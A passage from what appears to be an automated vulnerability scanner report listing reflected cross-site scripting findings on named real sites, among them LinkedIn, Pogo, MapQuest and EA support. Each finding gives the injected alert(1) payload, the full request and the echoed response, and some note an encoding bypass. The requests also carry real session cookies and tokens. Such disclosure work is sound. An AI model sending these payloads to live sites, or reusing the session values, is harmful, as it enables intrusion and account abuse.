Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico?bccb9<script>alert(1)</script>ded9f352e0=1 was not found on this server.</p>
...[SNIP]...

4.153. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /imag/exxonmobil.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 273a9<script>alert(1)</script>4cecfd08359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imag273a9<script>alert(1)</script>4cecfd08359/exxonmobil.ico HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:32:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 351
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /imag273a9<script>alert(1)</script>4cecfd08359/exxonmobil.ico was not found on this server.</p>
...[SNIP]...

4.154. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /imag/exxonmobil.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65346<script>alert(1)</script>2d65368a743 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imag/exxonmobil.ico65346<script>alert(1)</script>2d65368a743 HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:32:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 351
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /imag/exxonmobil.ico65346<script>alert(1)</script>2d65368a743 was not found on this server.</p>
...[SNIP]...

4.155. http://www.linkedin.com/countserv/count/share [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload ab4ac<script>alert(1)</script>e2878ead204 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.pymnts.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240%2Fab4ac<script>alert(1)</script>e2878ead204 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; bcookie="v=1&977d2a8e-45ea-4463-ac17-4a70c2eb7f42"; __qca=P0-831343408-1305412455203; leo_auth_token="GST:ZqtY8b5aGbfesyoNwehM01mPF93sGu2Q_HWHmQOSqQfsGho0v3A8iI:1308921992:2370742abe0050dd8b7266d61a7db03ef730095e"; JSESSIONID="ajax:8160619548287194313"; lang="v=2&lang=en&c="; NSC_MC_QH_MFP=ffffffffaf19965545525d5f4f58455e445a4a42198c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:39 GMT
Content-Length: 210

IN.Tags.Share.handleCount({"count":0,"url":"http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/ab4ac<script>alert(1)</script>e2878ead204"});

4.156. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [sourceid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of the sourceid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f2b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec356c9d923d was submitted in the sourceid parameter. This input was echoed as 12f2b</script><script>alert(1)</script>c356c9d923d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the sourceid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec356c9d923d&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 12595


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b</script><script>alert(1)</script>c356c9d923d&kw=free%20internet%20games&ad=6429295350&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618690632146297";
s.campaign="free_internet_g
...[SNIP]...

4.157. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/Scripts/AC_RunActiveContent.js

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df978</script><script>alert(1)</script>6085c15067d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/Scripts/AC_RunActiveContent.js HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=df978</script><script>alert(1)</script>6085c15067d
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922690996-New%7C1311514690996%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response

HTTP/1.1 404 /login/Scripts/AC_RunActiveContent.js
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:24 GMT
Server: Apache-Coyote/1.1
Content-Length: 4044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=df978</script><script>alert(1)</script>6085c15067d";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

4.158. http://www.pogo.com/login/entry.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/entry.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7a30</script><script>alert(1)</script>44a7311bc87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e7a30</script><script>alert(1)</script>44a7311bc87
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.site=pogo; s_pers=%20s_nr%3D1308922304648-New%7C1311514304648%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 12481


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=e7a30</script><script>alert(1)</script>44a7311bc87";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618939740244558";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252f
...[SNIP]...

4.159. http://www.pogo.com/login/media/Pogo_General_LP_2.swf [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/media/Pogo_General_LP_2.swf

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30799</script><script>alert(1)</script>4c0d8e0492b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/media/Pogo_General_LP_2.swf HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30799</script><script>alert(1)</script>4c0d8e0492b
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922705451-New%7C1311514705451%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response

HTTP/1.1 404 /login/media/Pogo_General_LP_2.swf
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:25 GMT
Server: Apache-Coyote/1.1
Content-Length: 4044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=30799</script><script>alert(1)</script>4c0d8e0492b";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

4.160. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49471</script><script>alert(1)</script>881b68c5a42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=49471</script><script>alert(1)</script>881b68c5a42

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 12270


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=49471</script><script>alert(1)</script>881b68c5a42";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618690632146297";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001";
s.channel="g
...[SNIP]...

4.161. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload e026d<script>alert(1)</script>0179e5f2a4f was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376e026d<script>alert(1)</script>0179e5f2a4f; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:13 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-13_15983333791308922273; expires=Wed, 22-Jun-2016 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15983333791308922273; expires=Fri, 24-Jun-2011 13:46:13 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376e026d<script>alert(1)</script>0179e5f2a4f';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15983333791308922273';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTca
...[SNIP]...

4.162. http://mapquest.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mapquest.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cb0f"><script>alert(1)</script>8a99c070059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?2cb0f"><script>alert(1)</script>8a99c070059=1 HTTP/1.1
Host: mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 24 Jun 2011 14:15:18 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Fri, 24 Jun 2011 14:45:18 GMT
Content-length: 136
Content-type: text/html
Location: http://www.mapquest.com/?2cb0f"><script>alert(1)</script>8a99c070059=1

<html>
<body>
Page relocated <a href="http://www.mapquest.com/?2cb0f"><script>alert(1)</script>8a99c070059=1">here.</a>
</body>
</html>

4.163. http://support.ea.com/ [cp_session cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /

Issue detail

The value of the cp_session cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 963d4"%3balert(1)//16be0394141 was submitted in the cp_session cookie. This input was echoed as 963d4";alert(1)//16be0394141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; cp_session=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21963d4"%3balert(1)//16be0394141; evar1=Not%20Logged%20In; s_sivo=US%3AEACOM%3ANONE; s_cc=true; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A%252F%252Fwww.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA; s_ppv=7

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:31 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUd%7EwVrEDs3czCrHpI9GxvBIbHW22x4yA7XvD3kXIOgat8SuOUtH2xdNwkCkYLlWOBkqntoAHmB6IK58G1KzQVCqAgdeJVGcSvYWuSYq5iulSXh6t9zsILtyUH5_DuMKR8W%7EiS6qsSs6zkGBB6Hdk3TasMZWAcCABP; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:48:30 GMT
RNT-Time: D=208941 t=1308923311037929
RNT-Machine: 13
Vary: Accept-Encoding
Content-Length: 70174
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
lo2t8WgxRqvPN~F3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo~U~ihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz~Hv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI!963d4";alert(1)//16be0394141";
s.prop11="";
s.prop6 = "";
s.prop7 = "";
s.prop8 = "";
s.prop12 = "";
s.prop13 = "";
s.prop16 = "";
s.prop17 = "";
var theBody=document.body;
if (theBody && document.body.addBehavior)
theBody.addBe
...[SNIP]...

4.164. http://support.ea.com/app/answers/detail/a_id/3628 [cp_session cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /app/answers/detail/a_id/3628

Issue detail

The value of the cp_session cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31232"%3balert(1)//5a7be544b54 was submitted in the cp_session cookie. This input was echoed as 31232";alert(1)//5a7be544b54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

